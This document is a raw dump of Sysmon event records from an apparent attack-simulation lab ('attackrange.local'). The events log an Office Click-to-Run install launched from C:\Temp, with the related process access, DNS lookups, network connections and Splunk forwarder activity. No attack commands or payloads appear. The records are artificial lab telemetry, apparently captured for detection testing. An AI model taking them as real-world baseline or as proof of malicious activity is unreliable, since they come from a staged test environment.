Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+2ccaf5|C:\Windows\System32\SHELL32.dll+1fccdd|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\C2RUI.dll+15678c|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\C2RUI.dll+1572de|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\C2RUI.dll+155bef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063308Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:39.394{A7A01FEF-EAF3-607E-6D0B-00000000BB01}44843096C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+2ccabf|C:\Windows\System32\SHELL32.dll+1fccdd|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\C2RUI.dll+15678c|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\C2RUI.dll+1572de|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\C2RUI.dll+155bef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063307Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:39.394{A7A01FEF-EAF3-607E-6D0B-00000000BB01}44843096C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+2cca45|C:\Windows\System32\SHELL32.dll+1fccb0|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\C2RUI.dll+15678c|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\C2RUI.dll+1572de|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\C2RUI.dll+155bef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063306Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:39.394{A7A01FEF-EAF3-607E-6D0B-00000000BB01}44843096C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+2cca32|C:\Windows\System32\SHELL32.dll+1fccb0|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\C2RUI.dll+15678c|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\C2RUI.dll+1572de|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\C2RUI.dll+155bef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063305Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:39.394{A7A01FEF-EAF3-607E-6D0B-00000000BB01}44843096C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+2cca32|C:\Windows\System32\SHELL32.dll+1fccb0|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\C2RUI.dll+15678c|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\C2RUI.dll+1572de|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\C2RUI.dll+155bef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063304Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:39.394{A7A01FEF-C0A6-607E-8105-00000000BB01}8365900C:\Windows\Explorer.EXE{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6164f|C:\Windows\System32\SHELL32.dll+62f35|C:\Windows\Explorer.EXE+5cf54|C:\Windows\Explorer.EXE+5c591|C:\Windows\Explorer.EXE+5a5a3|C:\Windows\Explorer.EXE+5983c|C:\Windows\Explorer.EXE+56de3|C:\Windows\Explorer.EXE+4bb4d|C:\Windows\Explorer.EXE+49f72|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+28e4e|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802548EC8C8)|UNKNOWN(FFFFF40710C0E49F)|UNKNOWN(FFFFF40710BB4C42)|UNKNOWN(FFFFF40710BAF241)|UNKNOWN(FFFFF40710BB0C0A)|UNKNOWN(FFFFF40710BAEEC6)|UNKNOWN(FFFFF80254603E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e 10341000x800000000000000063303Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:39.394{A7A01FEF-C0A6-607E-8105-00000000BB01}8365900C:\Windows\Explorer.EXE{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+62e4e|C:\Windows\Explorer.EXE+5cf54|C:\Windows\Explorer.EXE+5c591|C:\Windows\Explorer.EXE+5a5a3|C:\Windows\Explorer.EXE+5983c|C:\Windows\Explorer.EXE+56de3|C:\Windows\Explorer.EXE+4bb4d|C:\Windows\Explorer.EXE+49f72|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+28e4e|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802548EC8C8)|UNKNOWN(FFFFF40710C0E49F)|UNKNOWN(FFFFF40710BB4C42)|UNKNOWN(FFFFF40710BAF241)|UNKNOWN(FFFFF40710BB0C0A)|UNKNOWN(FFFFF40710BAEEC6)|UNKNOWN(FFFFF80254603E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\Explorer.EXE+51aca 10341000x800000000000000063302Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:39.394{A7A01FEF-C0A6-607E-8105-00000000BB01}8365900C:\Windows\Explorer.EXE{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62e17|C:\Windows\Explorer.EXE+5cf54|C:\Windows\Explorer.EXE+5c591|C:\Windows\Explorer.EXE+5a5a3|C:\Windows\Explorer.EXE+5983c|C:\Windows\Explorer.EXE+56de3|C:\Windows\Explorer.EXE+4bb4d|C:\Windows\Explorer.EXE+49f72|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+28e4e|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802548EC8C8)|UNKNOWN(FFFFF40710C0E49F)|UNKNOWN(FFFFF40710BB4C42)|UNKNOWN(FFFFF40710BAF241)|UNKNOWN(FFFFF40710BB0C0A)|UNKNOWN(FFFFF40710BAEEC6)|UNKNOWN(FFFFF80254603E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e 10341000x800000000000000063301Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:39.285{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B626-607E-1600-00000000BB01}1540C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000063300Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:39.238{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=673368061A374B558959BFFCB318E6F0,SHA256=E8C590A34A2C1AD8855F61A82C5A52056E18863F14398218D52FCE8910230C6D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000063299Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:39.175{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063298Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:39.175{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063297Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:39.175{A7A01FEF-B626-607E-1600-00000000BB01}15404372C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063296Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:39.175{A7A01FEF-B626-607E-1600-00000000BB01}15401640C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063295Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:39.128{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063294Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:39.081{A7A01FEF-C0A3-607E-6C05-00000000BB01}36244292C:\Windows\system32\csrss.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000063293Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:39.081{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063292Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:39.081{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063291Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:39.081{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063290Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:39.081{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063289Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:39.081{A7A01FEF-EAEC-607E-660B-00000000BB01}68406800C:\Temp\OfficeSetup.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Temp\OfficeSetup.exe+162225|C:\Temp\OfficeSetup.exe+162311|C:\Temp\OfficeSetup.exe+162ac2|C:\Temp\OfficeSetup.exe+13640|C:\Temp\OfficeSetup.exe+1324c|C:\Temp\OfficeSetup.exe+137e5|C:\Temp\OfficeSetup.exe+339a1|C:\Temp\OfficeSetup.exe+27f2a|C:\Temp\OfficeSetup.exe+2a554|C:\Temp\OfficeSetup.exe+2a519|C:\Temp\OfficeSetup.exe+2a5f0 154100x800000000000000063288Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:39.016{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe16.0.13127.21210Microsoft Office Click-to-Run (SxS)Microsoft OfficeMicrosoft CorporationOfficeClickToRun.exeOfficeClickToRun.exe platform=x64 culture=en-us productstoadd=O365ProPlusRetail.16_en-us_x-none cdnbaseurl.16=http://officecdn.microsoft.com/pr/7ffbc6bf-bc32-4f92-8982-f9dd17fd3114 baseurl.16=http://officecdn.microsoft.com/pr/7ffbc6bf-bc32-4f92-8982-f9dd17fd3114 version.16=16.0.13127.21348 mediatype.16=CDN sourcetype.16=CDN O365ProPlusRetail.excludedapps.16=groove bitnessmigration=False deliverymechanism=7ffbc6bf-bc32-4f92-8982-f9dd17fd3114 flt.useoutlookshareaddon=unknown flt.useofficehelperaddon=unknownC:\Temp\ATTACKRANGE\Administrator{A7A01FEF-C0A5-607E-58C6-320000000000}0x32c6582HighMD5=109DDC7C83BC3AEB49A647A89BD6362A,SHA256=A6F2C3A6E01E6859D00DAC8344560F840EB0AE385CF38FA88E4B91F762317643,IMPHASH=AFC358F4704431026A38B639D4132AC6{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exe"C:\Temp\OfficeSetup.exe" 354300x800000000000000063287Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:37.157{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com55146-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000063286Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:37.074{A7A01FEF-B626-607E-1600-00000000BB01}1540C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57454-false2.16.106.224a2-16-106-224.deploy.static.akamaitechnologies.com80http 354300x800000000000000063285Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:37.071{A7A01FEF-B626-607E-1600-00000000BB01}1540C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57453-false104.76.200.56a104-76-200-56.deploy.static.akamaitechnologies.com80http 10341000x800000000000000063284Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:39.003{A7A01FEF-B626-607E-1300-00000000BB01}12644440C:\Windows\System32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000049292Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:40.823{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9A8FA49EF06863E8B00E57FA55FC21A1,SHA256=52FF74ECE0AA2CAF9F38422A49478F4F8FFB9213E09F11169F8E2AD327A9ABC5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000063369Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:40.847{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3AA439F8F91427BEDA686DC6C43B057F,SHA256=AEB204B359B3DFC1BA9254C20F1EC4EFD5A9B7855DC32297618977644C5507D4,IMPHASH=00000000000000000000000000000000falsetrue 22542200x800000000000000063368Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:39.822{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092officecdn.microsoft.com.edgesuite.net0type: 5 officecdn.microsoft.com.edgesuite.net.globalredir.akadns.net;type: 5 a1737.dspw65.akamai.net;::ffff:2.16.106.224;::ffff:2.16.106.194;C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe 22542200x800000000000000063367Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:39.574{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092ecs.office.com0type: 5 ecs.office.trafficmanager.net;type: 5 s-0005-office.config.skype.com;type: 5 ecs-office.s-0005.s-msedge.net;type: 5 s-0005.s-msedge.net;::ffff:52.113.194.132;C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe 22542200x800000000000000063366Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:39.360{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484ecs.office.com0type: 5 ecs.office.trafficmanager.net;type: 5 s-0005-office.config.skype.com;type: 5 ecs-office.s-0005.s-msedge.net;type: 5 s-0005.s-msedge.net;::ffff:52.113.194.132;C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe 23542300x800000000000000063365Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:40.441{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 